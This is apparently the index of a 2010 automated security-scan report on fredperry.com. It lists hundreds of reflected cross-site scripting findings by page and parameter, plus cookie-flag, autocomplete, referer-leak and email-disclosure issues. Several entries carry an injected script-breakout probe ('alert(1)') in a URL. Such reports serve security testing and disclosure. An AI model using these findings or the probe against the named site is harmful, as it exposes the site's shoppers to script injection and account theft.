Report generated by Hoyt LLC Research at Tue Nov 09 18:42:29 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

1. Cross-site scripting (reflected)

1.1. http://www.fredperry.com/aboutus/careers/ [REST URL parameter 1]

1.2. http://www.fredperry.com/aboutus/careers/ [REST URL parameter 2]

1.3. http://www.fredperry.com/aboutus/careers/ [name of an arbitrarily supplied request parameter]

1.4. http://www.fredperry.com/aboutus/security/ [REST URL parameter 1]

1.5. http://www.fredperry.com/aboutus/security/ [REST URL parameter 2]

1.6. http://www.fredperry.com/aboutus/security/ [name of an arbitrarily supplied request parameter]

1.7. http://www.fredperry.com/aboutus/terms/ [REST URL parameter 1]

1.8. http://www.fredperry.com/aboutus/terms/ [REST URL parameter 2]

1.9. http://www.fredperry.com/aboutus/terms/ [name of an arbitrarily supplied request parameter]

1.10. http://www.fredperry.com/accessories/ [REST URL parameter 1]

1.11. http://www.fredperry.com/accessories/ [name of an arbitrarily supplied request parameter]

1.12. http://www.fredperry.com/accessories/men/ [REST URL parameter 1]

1.13. http://www.fredperry.com/accessories/men/ [REST URL parameter 2]

1.14. http://www.fredperry.com/accessories/men/ [name of an arbitrarily supplied request parameter]

1.15. http://www.fredperry.com/accessories/women/ [REST URL parameter 1]

1.16. http://www.fredperry.com/accessories/women/ [REST URL parameter 2]

1.17. http://www.fredperry.com/accessories/women/ [name of an arbitrarily supplied request parameter]

1.18. http://www.fredperry.com/arcade/ [REST URL parameter 1]

1.19. http://www.fredperry.com/arcade/ [name of an arbitrarily supplied request parameter]

1.20. http://www.fredperry.com/bags/ [REST URL parameter 1]

1.21. http://www.fredperry.com/bags/ [name of an arbitrarily supplied request parameter]

1.22. http://www.fredperry.com/bags/men/ [REST URL parameter 1]

1.23. http://www.fredperry.com/bags/men/ [REST URL parameter 2]

1.24. http://www.fredperry.com/bags/men/ [name of an arbitrarily supplied request parameter]

1.25. http://www.fredperry.com/bags/women/ [REST URL parameter 1]

1.26. http://www.fredperry.com/bags/women/ [REST URL parameter 2]

1.27. http://www.fredperry.com/bags/women/ [name of an arbitrarily supplied request parameter]

1.28. http://www.fredperry.com/catalogsearch/ajax/suggest/ [REST URL parameter 1]

1.29. http://www.fredperry.com/catalogsearch/ajax/suggest/ [REST URL parameter 2]

1.30. http://www.fredperry.com/catalogsearch/ajax/suggest/ [REST URL parameter 3]

1.31. http://www.fredperry.com/catalogsearch/result/ [REST URL parameter 1]

1.32. http://www.fredperry.com/catalogsearch/result/ [REST URL parameter 2]

1.33. http://www.fredperry.com/checkout/cart/ [REST URL parameter 1]

1.34. http://www.fredperry.com/checkout/cart/ [REST URL parameter 2]

1.35. http://www.fredperry.com/checkout/cart/ [name of an arbitrarily supplied request parameter]

1.36. http://www.fredperry.com/contacts/ [REST URL parameter 1]

1.37. http://www.fredperry.com/contacts/ [name of an arbitrarily supplied request parameter]

1.38. http://www.fredperry.com/customercare/ [REST URL parameter 1]

1.39. http://www.fredperry.com/customercare/ [name of an arbitrarily supplied request parameter]

1.40. http://www.fredperry.com/customercare/delivery/ [REST URL parameter 1]

1.41. http://www.fredperry.com/customercare/delivery/ [REST URL parameter 2]

1.42. http://www.fredperry.com/customercare/delivery/ [name of an arbitrarily supplied request parameter]

1.43. http://www.fredperry.com/customercare/deliverylate/ [REST URL parameter 1]

1.44. http://www.fredperry.com/customercare/deliverylate/ [REST URL parameter 2]

1.45. http://www.fredperry.com/customercare/deliverylate/ [name of an arbitrarily supplied request parameter]

1.46. http://www.fredperry.com/customercare/faq/ [REST URL parameter 1]

1.47. http://www.fredperry.com/customercare/faq/ [REST URL parameter 2]

1.48. http://www.fredperry.com/customercare/faq/ [name of an arbitrarily supplied request parameter]

1.49. http://www.fredperry.com/customercare/information/ [REST URL parameter 1]

1.50. http://www.fredperry.com/customercare/information/ [REST URL parameter 2]

1.51. http://www.fredperry.com/customercare/information/ [name of an arbitrarily supplied request parameter]

1.52. http://www.fredperry.com/customercare/ordertracking/ [REST URL parameter 1]

1.53. http://www.fredperry.com/customercare/ordertracking/ [REST URL parameter 2]

1.54. http://www.fredperry.com/customercare/ordertracking/ [name of an arbitrarily supplied request parameter]

1.55. http://www.fredperry.com/customercare/returns/ [REST URL parameter 1]

1.56. http://www.fredperry.com/customercare/returns/ [REST URL parameter 2]

1.57. http://www.fredperry.com/customercare/returns/ [name of an arbitrarily supplied request parameter]

1.58. http://www.fredperry.com/footwear/ [REST URL parameter 1]

1.59. http://www.fredperry.com/footwear/ [name of an arbitrarily supplied request parameter]

1.60. http://www.fredperry.com/footwear/men/ [REST URL parameter 1]

1.61. http://www.fredperry.com/footwear/men/ [REST URL parameter 2]

1.62. http://www.fredperry.com/footwear/men/ [name of an arbitrarily supplied request parameter]

1.63. http://www.fredperry.com/footwear/women/ [REST URL parameter 1]

1.64. http://www.fredperry.com/footwear/women/ [REST URL parameter 2]

1.65. http://www.fredperry.com/footwear/women/ [name of an arbitrarily supplied request parameter]

1.66. http://www.fredperry.com/heritage/ [REST URL parameter 1]

1.67. http://www.fredperry.com/heritage/ [name of an arbitrarily supplied request parameter]

1.68. http://www.fredperry.com/home/ [REST URL parameter 1]

1.69. http://www.fredperry.com/home/ [name of an arbitrarily supplied request parameter]

1.70. http://www.fredperry.com/js/index.php [REST URL parameter 1]

1.71. http://www.fredperry.com/kids/kidswear/ [REST URL parameter 1]

1.72. http://www.fredperry.com/kids/kidswear/ [REST URL parameter 2]

1.73. http://www.fredperry.com/kids/kidswear/ [name of an arbitrarily supplied request parameter]

1.74. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/ [REST URL parameter 1]

1.75. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/ [REST URL parameter 2]

1.76. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/ [name of an arbitrarily supplied request parameter]

1.77. http://www.fredperry.com/limited-edition/ [REST URL parameter 1]

1.78. http://www.fredperry.com/limited-edition/ [name of an arbitrarily supplied request parameter]

1.79. http://www.fredperry.com/limited-edition/men/ [REST URL parameter 1]

1.80. http://www.fredperry.com/limited-edition/men/ [REST URL parameter 2]

1.81. http://www.fredperry.com/limited-edition/men/ [name of an arbitrarily supplied request parameter]

1.82. http://www.fredperry.com/limited-edition/men/accessories/ [REST URL parameter 1]

1.83. http://www.fredperry.com/limited-edition/men/accessories/ [REST URL parameter 2]

1.84. http://www.fredperry.com/limited-edition/men/accessories/ [REST URL parameter 3]

1.85. http://www.fredperry.com/limited-edition/men/accessories/ [name of an arbitrarily supplied request parameter]

1.86. http://www.fredperry.com/limited-edition/men/bags/ [REST URL parameter 1]

1.87. http://www.fredperry.com/limited-edition/men/bags/ [REST URL parameter 2]

1.88. http://www.fredperry.com/limited-edition/men/bags/ [REST URL parameter 3]

1.89. http://www.fredperry.com/limited-edition/men/bags/ [name of an arbitrarily supplied request parameter]

1.90. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [REST URL parameter 1]

1.91. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [REST URL parameter 2]

1.92. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [REST URL parameter 3]

1.93. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [name of an arbitrarily supplied request parameter]

1.94. http://www.fredperry.com/limited-edition/men/british-collectables/ [REST URL parameter 1]

1.95. http://www.fredperry.com/limited-edition/men/british-collectables/ [REST URL parameter 2]

1.96. http://www.fredperry.com/limited-edition/men/british-collectables/ [REST URL parameter 3]

1.97. http://www.fredperry.com/limited-edition/men/british-collectables/ [name of an arbitrarily supplied request parameter]

1.98. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [REST URL parameter 1]

1.99. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [REST URL parameter 2]

1.100. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [REST URL parameter 3]

1.101. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [name of an arbitrarily supplied request parameter]

1.102. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [REST URL parameter 1]

1.103. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [REST URL parameter 2]

1.104. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [REST URL parameter 3]

1.105. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [SID parameter]

1.106. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [name of an arbitrarily supplied request parameter]

1.107. http://www.fredperry.com/limited-edition/men/footwear/ [REST URL parameter 1]

1.108. http://www.fredperry.com/limited-edition/men/footwear/ [REST URL parameter 2]

1.109. http://www.fredperry.com/limited-edition/men/footwear/ [REST URL parameter 3]

1.110. http://www.fredperry.com/limited-edition/men/footwear/ [name of an arbitrarily supplied request parameter]

1.111. http://www.fredperry.com/limited-edition/men/jackets/ [REST URL parameter 1]

1.112. http://www.fredperry.com/limited-edition/men/jackets/ [REST URL parameter 2]

1.113. http://www.fredperry.com/limited-edition/men/jackets/ [REST URL parameter 3]

1.114. http://www.fredperry.com/limited-edition/men/jackets/ [name of an arbitrarily supplied request parameter]

1.115. http://www.fredperry.com/limited-edition/men/knitwear/ [REST URL parameter 1]

1.116. http://www.fredperry.com/limited-edition/men/knitwear/ [REST URL parameter 2]

1.117. http://www.fredperry.com/limited-edition/men/knitwear/ [REST URL parameter 3]

1.118. http://www.fredperry.com/limited-edition/men/knitwear/ [name of an arbitrarily supplied request parameter]

1.119. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [REST URL parameter 1]

1.120. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [REST URL parameter 2]

1.121. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [REST URL parameter 3]

1.122. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [name of an arbitrarily supplied request parameter]

1.123. http://www.fredperry.com/limited-edition/men/new-styles/ [REST URL parameter 1]

1.124. http://www.fredperry.com/limited-edition/men/new-styles/ [REST URL parameter 2]

1.125. http://www.fredperry.com/limited-edition/men/new-styles/ [REST URL parameter 3]

1.126. http://www.fredperry.com/limited-edition/men/new-styles/ [name of an arbitrarily supplied request parameter]

1.127. http://www.fredperry.com/limited-edition/men/shirts/ [REST URL parameter 1]

1.128. http://www.fredperry.com/limited-edition/men/shirts/ [REST URL parameter 2]

1.129. http://www.fredperry.com/limited-edition/men/shirts/ [REST URL parameter 3]

1.130. http://www.fredperry.com/limited-edition/men/shirts/ [name of an arbitrarily supplied request parameter]

1.131. http://www.fredperry.com/limited-edition/men/shorts/ [REST URL parameter 1]

1.132. http://www.fredperry.com/limited-edition/men/shorts/ [REST URL parameter 2]

1.133. http://www.fredperry.com/limited-edition/men/shorts/ [REST URL parameter 3]

1.134. http://www.fredperry.com/limited-edition/men/shorts/ [name of an arbitrarily supplied request parameter]

1.135. http://www.fredperry.com/limited-edition/men/trousers/ [REST URL parameter 1]

1.136. http://www.fredperry.com/limited-edition/men/trousers/ [REST URL parameter 2]

1.137. http://www.fredperry.com/limited-edition/men/trousers/ [REST URL parameter 3]

1.138. http://www.fredperry.com/limited-edition/men/trousers/ [name of an arbitrarily supplied request parameter]

1.139. http://www.fredperry.com/limited-edition/men/woven-shirts/ [REST URL parameter 1]

1.140. http://www.fredperry.com/limited-edition/men/woven-shirts/ [REST URL parameter 2]

1.141. http://www.fredperry.com/limited-edition/men/woven-shirts/ [REST URL parameter 3]

1.142. http://www.fredperry.com/limited-edition/men/woven-shirts/ [name of an arbitrarily supplied request parameter]

1.143. http://www.fredperry.com/limited-edition/women/ [REST URL parameter 1]

1.144. http://www.fredperry.com/limited-edition/women/ [REST URL parameter 2]

1.145. http://www.fredperry.com/limited-edition/women/ [name of an arbitrarily supplied request parameter]

1.146. http://www.fredperry.com/limited-edition/women/accessories/ [REST URL parameter 1]

1.147. http://www.fredperry.com/limited-edition/women/accessories/ [REST URL parameter 2]

1.148. http://www.fredperry.com/limited-edition/women/accessories/ [REST URL parameter 3]

1.149. http://www.fredperry.com/limited-edition/women/accessories/ [name of an arbitrarily supplied request parameter]

1.150. http://www.fredperry.com/limited-edition/women/bags/ [REST URL parameter 1]

1.151. http://www.fredperry.com/limited-edition/women/bags/ [REST URL parameter 2]

1.152. http://www.fredperry.com/limited-edition/women/bags/ [REST URL parameter 3]

1.153. http://www.fredperry.com/limited-edition/women/bags/ [name of an arbitrarily supplied request parameter]

1.154. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [REST URL parameter 1]

1.155. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [REST URL parameter 2]

1.156. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [REST URL parameter 3]

1.157. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [name of an arbitrarily supplied request parameter]

1.158. http://www.fredperry.com/limited-edition/women/collaboration/ [REST URL parameter 1]

1.159. http://www.fredperry.com/limited-edition/women/collaboration/ [REST URL parameter 2]

1.160. http://www.fredperry.com/limited-edition/women/collaboration/ [REST URL parameter 3]

1.161. http://www.fredperry.com/limited-edition/women/collaboration/ [name of an arbitrarily supplied request parameter]

1.162. http://www.fredperry.com/limited-edition/women/dresses/ [REST URL parameter 1]

1.163. http://www.fredperry.com/limited-edition/women/dresses/ [REST URL parameter 2]

1.164. http://www.fredperry.com/limited-edition/women/dresses/ [REST URL parameter 3]

1.165. http://www.fredperry.com/limited-edition/women/dresses/ [name of an arbitrarily supplied request parameter]

1.166. http://www.fredperry.com/limited-edition/women/footwear/ [REST URL parameter 1]

1.167. http://www.fredperry.com/limited-edition/women/footwear/ [REST URL parameter 2]

1.168. http://www.fredperry.com/limited-edition/women/footwear/ [REST URL parameter 3]

1.169. http://www.fredperry.com/limited-edition/women/footwear/ [name of an arbitrarily supplied request parameter]

1.170. http://www.fredperry.com/limited-edition/women/jackets/ [REST URL parameter 1]

1.171. http://www.fredperry.com/limited-edition/women/jackets/ [REST URL parameter 2]

1.172. http://www.fredperry.com/limited-edition/women/jackets/ [REST URL parameter 3]

1.173. http://www.fredperry.com/limited-edition/women/jackets/ [name of an arbitrarily supplied request parameter]

1.174. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [REST URL parameter 1]

1.175. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [REST URL parameter 2]

1.176. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [REST URL parameter 3]

1.177. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [name of an arbitrarily supplied request parameter]

1.178. http://www.fredperry.com/limited-edition/women/knitwear/ [REST URL parameter 1]

1.179. http://www.fredperry.com/limited-edition/women/knitwear/ [REST URL parameter 2]

1.180. http://www.fredperry.com/limited-edition/women/knitwear/ [REST URL parameter 3]

1.181. http://www.fredperry.com/limited-edition/women/knitwear/ [name of an arbitrarily supplied request parameter]

1.182. http://www.fredperry.com/limited-edition/women/new-styles/ [REST URL parameter 1]

1.183. http://www.fredperry.com/limited-edition/women/new-styles/ [REST URL parameter 2]

1.184. http://www.fredperry.com/limited-edition/women/new-styles/ [REST URL parameter 3]

1.185. http://www.fredperry.com/limited-edition/women/new-styles/ [name of an arbitrarily supplied request parameter]

1.186. http://www.fredperry.com/limited-edition/women/shirts/ [REST URL parameter 1]

1.187. http://www.fredperry.com/limited-edition/women/shirts/ [REST URL parameter 2]

1.188. http://www.fredperry.com/limited-edition/women/shirts/ [REST URL parameter 3]

1.189. http://www.fredperry.com/limited-edition/women/shirts/ [name of an arbitrarily supplied request parameter]

1.190. http://www.fredperry.com/limited-edition/women/shorts/ [REST URL parameter 1]

1.191. http://www.fredperry.com/limited-edition/women/shorts/ [REST URL parameter 2]

1.192. http://www.fredperry.com/limited-edition/women/shorts/ [REST URL parameter 3]

1.193. http://www.fredperry.com/limited-edition/women/shorts/ [name of an arbitrarily supplied request parameter]

1.194. http://www.fredperry.com/limited-edition/women/skirts/ [REST URL parameter 1]

1.195. http://www.fredperry.com/limited-edition/women/skirts/ [REST URL parameter 2]

1.196. http://www.fredperry.com/limited-edition/women/skirts/ [REST URL parameter 3]

1.197. http://www.fredperry.com/limited-edition/women/skirts/ [name of an arbitrarily supplied request parameter]

1.198. http://www.fredperry.com/limited-edition/women/trousers/ [REST URL parameter 1]

1.199. http://www.fredperry.com/limited-edition/women/trousers/ [REST URL parameter 2]

1.200. http://www.fredperry.com/limited-edition/women/trousers/ [REST URL parameter 3]

1.201. http://www.fredperry.com/limited-edition/women/trousers/ [name of an arbitrarily supplied request parameter]

1.202. http://www.fredperry.com/limited-edition/women/woven-shirts/ [REST URL parameter 1]

1.203. http://www.fredperry.com/limited-edition/women/woven-shirts/ [REST URL parameter 2]

1.204. http://www.fredperry.com/limited-edition/women/woven-shirts/ [REST URL parameter 3]

1.205. http://www.fredperry.com/limited-edition/women/woven-shirts/ [name of an arbitrarily supplied request parameter]

1.206. http://www.fredperry.com/men/ [REST URL parameter 1]

1.207. http://www.fredperry.com/men/ [name of an arbitrarily supplied request parameter]

1.208. http://www.fredperry.com/men/jackets/ [REST URL parameter 1]

1.209. http://www.fredperry.com/men/jackets/ [REST URL parameter 2]

1.210. http://www.fredperry.com/men/jackets/ [name of an arbitrarily supplied request parameter]

1.211. http://www.fredperry.com/men/knitwear/ [REST URL parameter 1]

1.212. http://www.fredperry.com/men/knitwear/ [REST URL parameter 2]

1.213. http://www.fredperry.com/men/knitwear/ [name of an arbitrarily supplied request parameter]

1.214. http://www.fredperry.com/men/shirts/ [REST URL parameter 1]

1.215. http://www.fredperry.com/men/shirts/ [REST URL parameter 2]

1.216. http://www.fredperry.com/men/shirts/ [name of an arbitrarily supplied request parameter]

1.217. http://www.fredperry.com/men/t-shirts/ [REST URL parameter 1]

1.218. http://www.fredperry.com/men/t-shirts/ [REST URL parameter 2]

1.219. http://www.fredperry.com/men/t-shirts/ [name of an arbitrarily supplied request parameter]

1.220. http://www.fredperry.com/men/tennis/ [REST URL parameter 1]

1.221. http://www.fredperry.com/men/tennis/ [REST URL parameter 2]

1.222. http://www.fredperry.com/men/tennis/ [name of an arbitrarily supplied request parameter]

1.223. http://www.fredperry.com/men/track-jackets/ [REST URL parameter 1]

1.224. http://www.fredperry.com/men/track-jackets/ [REST URL parameter 2]

1.225. http://www.fredperry.com/men/track-jackets/ [name of an arbitrarily supplied request parameter]

1.226. http://www.fredperry.com/men/trousers/ [REST URL parameter 1]

1.227. http://www.fredperry.com/men/trousers/ [REST URL parameter 2]

1.228. http://www.fredperry.com/men/trousers/ [name of an arbitrarily supplied request parameter]

1.229. http://www.fredperry.com/men/woven-shirts/ [REST URL parameter 1]

1.230. http://www.fredperry.com/men/woven-shirts/ [REST URL parameter 2]

1.231. http://www.fredperry.com/men/woven-shirts/ [name of an arbitrarily supplied request parameter]

1.232. http://www.fredperry.com/productinfo/clothingsizes/ [REST URL parameter 1]

1.233. http://www.fredperry.com/productinfo/clothingsizes/ [REST URL parameter 2]

1.234. http://www.fredperry.com/productinfo/clothingsizes/ [name of an arbitrarily supplied request parameter]

1.235. http://www.fredperry.com/productinfo/footwearsizes/ [REST URL parameter 1]

1.236. http://www.fredperry.com/productinfo/footwearsizes/ [REST URL parameter 2]

1.237. http://www.fredperry.com/productinfo/footwearsizes/ [name of an arbitrarily supplied request parameter]

1.238. http://www.fredperry.com/productinfo/garmentcare/ [REST URL parameter 1]

1.239. http://www.fredperry.com/productinfo/garmentcare/ [REST URL parameter 2]

1.240. http://www.fredperry.com/productinfo/garmentcare/ [name of an arbitrarily supplied request parameter]

1.241. http://www.fredperry.com/sale/ [REST URL parameter 1]

1.242. http://www.fredperry.com/sale/ [name of an arbitrarily supplied request parameter]

1.243. http://www.fredperry.com/shops/ [REST URL parameter 1]

1.244. http://www.fredperry.com/shops/ [name of an arbitrarily supplied request parameter]

1.245. http://www.fredperry.com/site-map/ [REST URL parameter 1]

1.246. http://www.fredperry.com/site-map/ [name of an arbitrarily supplied request parameter]

1.247. http://www.fredperry.com/women/ [REST URL parameter 1]

1.248. http://www.fredperry.com/women/ [name of an arbitrarily supplied request parameter]

1.249. http://www.fredperry.com/women/amy-winehouse-landing/ [REST URL parameter 1]

1.250. http://www.fredperry.com/women/amy-winehouse-landing/ [REST URL parameter 2]

1.251. http://www.fredperry.com/women/amy-winehouse-landing/ [name of an arbitrarily supplied request parameter]

1.252. http://www.fredperry.com/women/amy-winehouse/ [REST URL parameter 1]

1.253. http://www.fredperry.com/women/amy-winehouse/ [REST URL parameter 2]

1.254. http://www.fredperry.com/women/amy-winehouse/ [name of an arbitrarily supplied request parameter]

1.255. http://www.fredperry.com/women/dresses/ [REST URL parameter 1]

1.256. http://www.fredperry.com/women/dresses/ [REST URL parameter 2]

1.257. http://www.fredperry.com/women/dresses/ [name of an arbitrarily supplied request parameter]

1.258. http://www.fredperry.com/women/jackets/ [REST URL parameter 1]

1.259. http://www.fredperry.com/women/jackets/ [REST URL parameter 2]

1.260. http://www.fredperry.com/women/jackets/ [name of an arbitrarily supplied request parameter]

1.261. http://www.fredperry.com/women/knitwear/ [REST URL parameter 1]

1.262. http://www.fredperry.com/women/knitwear/ [REST URL parameter 2]

1.263. http://www.fredperry.com/women/knitwear/ [name of an arbitrarily supplied request parameter]

1.264. http://www.fredperry.com/women/shirts/ [REST URL parameter 1]

1.265. http://www.fredperry.com/women/shirts/ [REST URL parameter 2]

1.266. http://www.fredperry.com/women/shirts/ [name of an arbitrarily supplied request parameter]

1.267. http://www.fredperry.com/women/skirts/ [REST URL parameter 1]

1.268. http://www.fredperry.com/women/skirts/ [REST URL parameter 2]

1.269. http://www.fredperry.com/women/skirts/ [name of an arbitrarily supplied request parameter]

1.270. http://www.fredperry.com/women/t-shirts/ [REST URL parameter 1]

1.271. http://www.fredperry.com/women/t-shirts/ [REST URL parameter 2]

1.272. http://www.fredperry.com/women/t-shirts/ [name of an arbitrarily supplied request parameter]

1.273. http://www.fredperry.com/women/tennis/ [REST URL parameter 1]

1.274. http://www.fredperry.com/women/tennis/ [REST URL parameter 2]

1.275. http://www.fredperry.com/women/tennis/ [name of an arbitrarily supplied request parameter]

1.276. http://www.fredperry.com/women/trousers/ [REST URL parameter 1]

1.277. http://www.fredperry.com/women/trousers/ [REST URL parameter 2]

1.278. http://www.fredperry.com/women/trousers/ [name of an arbitrarily supplied request parameter]

1.279. http://www.fredperry.com/women/woven-shirts/ [REST URL parameter 1]

1.280. http://www.fredperry.com/women/woven-shirts/ [REST URL parameter 2]

1.281. http://www.fredperry.com/women/woven-shirts/ [name of an arbitrarily supplied request parameter]

1.282. https://www.fredperry.com/customer/account/ [REST URL parameter 1]

1.283. https://www.fredperry.com/customer/account/ [REST URL parameter 2]

1.284. https://www.fredperry.com/customer/account/login/ [REST URL parameter 1]

1.285. https://www.fredperry.com/customer/account/login/ [REST URL parameter 2]

1.286. https://www.fredperry.com/customer/account/login/ [REST URL parameter 3]

1.287. https://www.fredperry.com/customer/account/login/ [name of an arbitrarily supplied request parameter]

1.288. https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/ [name of an arbitrarily supplied request parameter]

1.289. https://www.fredperry.com/sales/order/history/ [REST URL parameter 1]

1.290. https://www.fredperry.com/sales/order/history/ [REST URL parameter 2]

1.291. https://www.fredperry.com/sales/order/history/ [REST URL parameter 3]

2. Password field with autocomplete enabled

3. SSL cookie without secure flag set

3.1. https://www.fredperry.com/customer/account/

3.2. https://www.fredperry.com/customer/account/login/

3.3. https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/

3.4. https://www.fredperry.com/sales/order/history/

4. Cross-domain Referer leakage

5. Cross-domain script include

6. Cookie without HttpOnly flag set

6.1. http://www.fredperry.com/aboutus/careers/

6.2. http://www.fredperry.com/aboutus/security/

6.3. http://www.fredperry.com/aboutus/terms/

6.4. http://www.fredperry.com/accessories/

6.5. http://www.fredperry.com/accessories/men/

6.6. http://www.fredperry.com/accessories/women/

6.7. http://www.fredperry.com/arcade/

6.8. http://www.fredperry.com/bags/

6.9. http://www.fredperry.com/bags/men/

6.10. http://www.fredperry.com/bags/women/

6.11. http://www.fredperry.com/catalogsearch/ajax/suggest/

6.12. http://www.fredperry.com/catalogsearch/result/

6.13. http://www.fredperry.com/checkout/cart/

6.14. http://www.fredperry.com/contacts/

6.15. http://www.fredperry.com/customercare/

6.16. http://www.fredperry.com/customercare/delivery/

6.17. http://www.fredperry.com/customercare/deliverylate/

6.18. http://www.fredperry.com/customercare/faq/

6.19. http://www.fredperry.com/customercare/information/

6.20. http://www.fredperry.com/customercare/ordertracking/

6.21. http://www.fredperry.com/customercare/returns/

6.22. http://www.fredperry.com/footwear/

6.23. http://www.fredperry.com/footwear/men/

6.24. http://www.fredperry.com/footwear/women/

6.25. http://www.fredperry.com/heritage/

6.26. http://www.fredperry.com/home/

6.27. http://www.fredperry.com/js/index.php

6.28. http://www.fredperry.com/kids/kidswear/

6.29. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/

6.30. http://www.fredperry.com/limited-edition/

6.31. http://www.fredperry.com/limited-edition/men/

6.32. http://www.fredperry.com/limited-edition/men/accessories/

6.33. http://www.fredperry.com/limited-edition/men/bags/

6.34. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/

6.35. http://www.fredperry.com/limited-edition/men/british-collectables/

6.36. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/

6.37. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/

6.38. http://www.fredperry.com/limited-edition/men/footwear/

6.39. http://www.fredperry.com/limited-edition/men/jackets/

6.40. http://www.fredperry.com/limited-edition/men/knitwear/

6.41. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/

6.42. http://www.fredperry.com/limited-edition/men/new-styles/

6.43. http://www.fredperry.com/limited-edition/men/shirts/

6.44. http://www.fredperry.com/limited-edition/men/shorts/

6.45. http://www.fredperry.com/limited-edition/men/trousers/

6.46. http://www.fredperry.com/limited-edition/men/woven-shirts/

6.47. http://www.fredperry.com/limited-edition/women/

6.48. http://www.fredperry.com/limited-edition/women/accessories/

6.49. http://www.fredperry.com/limited-edition/women/bags/

6.50. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/

6.51. http://www.fredperry.com/limited-edition/women/collaboration/

6.52. http://www.fredperry.com/limited-edition/women/dresses/

6.53. http://www.fredperry.com/limited-edition/women/footwear/

6.54. http://www.fredperry.com/limited-edition/women/jackets/

6.55. http://www.fredperry.com/limited-edition/women/jessica-ogden/

6.56. http://www.fredperry.com/limited-edition/women/knitwear/

6.57. http://www.fredperry.com/limited-edition/women/new-styles/

6.58. http://www.fredperry.com/limited-edition/women/shirts/

6.59. http://www.fredperry.com/limited-edition/women/shorts/

6.60. http://www.fredperry.com/limited-edition/women/skirts/

6.61. http://www.fredperry.com/limited-edition/women/trousers/

6.62. http://www.fredperry.com/limited-edition/women/woven-shirts/

6.63. http://www.fredperry.com/men/

6.64. http://www.fredperry.com/men/jackets/

6.65. http://www.fredperry.com/men/knitwear/

6.66. http://www.fredperry.com/men/shirts/

6.67. http://www.fredperry.com/men/t-shirts/

6.68. http://www.fredperry.com/men/tennis/

6.69. http://www.fredperry.com/men/track-jackets/

6.70. http://www.fredperry.com/men/trousers/

6.71. http://www.fredperry.com/men/woven-shirts/

6.72. http://www.fredperry.com/productinfo/clothingsizes/

6.73. http://www.fredperry.com/productinfo/footwearsizes/

6.74. http://www.fredperry.com/productinfo/garmentcare/

6.75. http://www.fredperry.com/sale/

6.76. http://www.fredperry.com/shops/

6.77. http://www.fredperry.com/site-map/

6.78. http://www.fredperry.com/skin/frontend/default/default/css/catalogue.css

6.79. http://www.fredperry.com/skin/frontend/default/default/css/clears.css

6.80. http://www.fredperry.com/skin/frontend/default/default/css/fp_style.css

6.81. http://www.fredperry.com/skin/frontend/default/default/css/generalpages.css

6.82. http://www.fredperry.com/skin/frontend/default/default/css/gs_960.css

6.83. http://www.fredperry.com/skin/frontend/default/default/css/gs_reset.css

6.84. http://www.fredperry.com/skin/frontend/default/default/css/gs_text.css

6.85. http://www.fredperry.com/skin/frontend/default/default/css/payment.css

6.86. http://www.fredperry.com/skin/frontend/default/default/css/print.css

6.87. http://www.fredperry.com/skin/frontend/default/default/css/styles.css

6.88. http://www.fredperry.com/women/

6.89. http://www.fredperry.com/women/amy-winehouse-landing/

6.90. http://www.fredperry.com/women/amy-winehouse/

6.91. http://www.fredperry.com/women/dresses/

6.92. http://www.fredperry.com/women/jackets/

6.93. http://www.fredperry.com/women/knitwear/

6.94. http://www.fredperry.com/women/shirts/

6.95. http://www.fredperry.com/women/skirts/

6.96. http://www.fredperry.com/women/t-shirts/

6.97. http://www.fredperry.com/women/tennis/

6.98. http://www.fredperry.com/women/trousers/

6.99. http://www.fredperry.com/women/woven-shirts/

6.100. https://www.fredperry.com/customer/account/

6.101. https://www.fredperry.com/customer/account/login/

6.102. https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/

6.103. https://www.fredperry.com/sales/order/history/

7. Email addresses disclosed

7.1. http://www.fredperry.com/aboutus/careers/

7.2. http://www.fredperry.com/customercare/deliverylate/

7.3. http://www.fredperry.com/customercare/faq/

7.4. http://www.fredperry.com/customercare/returns/

7.5. http://www.fredperry.com/js/index.php

7.6. http://www.fredperry.com/shops/

7.7. http://www.fredperry.com/skin/frontend/default/default/css/clears.css

7.8. http://www.fredperry.com/skin/frontend/default/default/css/print.css

7.9. http://www.fredperry.com/skin/frontend/default/default/css/styles.css

7.10. https://www.fredperry.com/js/index.php

7.11. https://www.fredperry.com/skin/frontend/default/default/css/clears.css

